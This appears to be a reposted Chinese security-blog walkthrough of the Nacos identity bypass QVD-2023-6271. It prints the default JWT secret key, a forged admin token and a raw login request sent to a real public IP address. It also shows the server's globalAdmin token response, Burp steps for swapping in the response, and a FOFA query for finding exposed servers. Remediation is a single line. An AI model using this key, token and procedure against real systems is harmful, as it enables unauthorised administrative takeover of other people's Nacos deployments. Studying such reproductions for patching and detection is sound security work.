QVD-2023-6271—Nacos身份绕过漏洞

admin

104949
文章

87
评论

2023年6月19日00:19:39评论46 views字数 2458阅读8分11秒阅读模式

漏洞原理

开源服务管理平台nacos在默认配置下未对token.secret.key进行修改，导致远程攻击者可以绕过密钥认证进入后台，造成系统受控等后果。

本次复现版本为2.1.0

受影响版本

0.1.0<=nacos<=2.2.0

FOFA语句

app="nacos"

漏洞复现

QVD-2023-6271—Nacos身份绕过漏洞

在nacos中，token.secret.key值是固定的，

key=SecretKey012345678901234567890123456789012345678901234567890123456789

利用该默认key可进行jwt构造，直接进入后台，构造方法：
在https://jwt.io/中：输入默认key：

{"sub": "nacos","exp": 1682908266}

QVD-2023-6271—Nacos身份绕过漏洞

复制上面得到的值

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_Q

任意账号密码、账号提交，burp抓包后构造

admin 123456

QVD-2023-6271—Nacos身份绕过漏洞

POST /nacos/v1/auth/users/login HTTP/1.1Host: 139.196.217.155User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 30Origin: http://139.196.217.155Connection: closeReferer: http://139.196.217.155/nacos/Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_Q
username=admin&password=123456

此时得到了token

HTTP/1.1 200 Server: nginx/1.14.1Date: Thu, 15 Jun 2023 09:45:29 GMTContent-Type: application/json;charset=UTF-8Connection: closeVary: OriginVary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersAccess-Control-Allow-Origin: http://139.196.217.155Access-Control-Allow-Credentials: trueContent-Security-Policy: script-src 'self'Set-Cookie: JSESSIONID=594323A71DA9845542A25B88465B4D4D; Path=/nacos; HttpOnlyAuthorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_QContent-Length: 197
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY4NjkwODI2Nn0.I5jgpJWo0GgM-pFFFoBY9JFBTo8kr_0yU23mK-DGW_Q","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}

将上面获取到的cookie填入数据包中，然后burp抓返回包

QVD-2023-6271—Nacos身份绕过漏洞

右击选择Do intercept–>Response to request，点击Forward，发现报500错

QVD-2023-6271—Nacos身份绕过漏洞找到之前的构造cookie的返回包，复制并粘贴，放包

QVD-2023-6271—Nacos身份绕过漏洞

登录成功

QVD-2023-6271—Nacos身份绕过漏洞

修复建议

升级nacos版本至最新版本

QVD-2023-6271—Nacos身份绕过漏洞

本文版权归作者和微信公众号平台共有，重在学习交流，不以任何盈利为目的，欢迎转载。

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用，大部分文章来自各大安全社区，个人博客，如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览！！！

敲敲小黑板：《刑法》第二百八十五条　【非法侵入计算机信息系统罪；非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。

原文始发于微信公众号（巢安实验室）：QVD-2023-6271—Nacos身份绕过漏洞

左青龙
微信扫一扫

右白虎
微信扫一扫

QVD-2023-6271—Nacos身份绕过漏洞

某ERP系统RCE漏洞（附EXP）

金盘图书馆微信管理后台信息泄露漏洞

用友畅捷通T+ Upload.aspx 任意文件上传漏洞

漏洞预警 | Apache Superset服务器端请求伪造漏洞

漏洞预警 | Google Android Framework权限提升漏洞

漏洞预警 | Apple ImageIO远程代码执行漏洞

QQ 逻辑漏洞可执行文件漏洞复现

Spring Cloud Function SpEL 远程代码执行漏洞（CVE-2022-22963）

【漏洞情报】Redis SORT_RO命令可绕过 ACL 配置

禅道RCE漏洞（附EXP）

发表评论

在线咨询

微信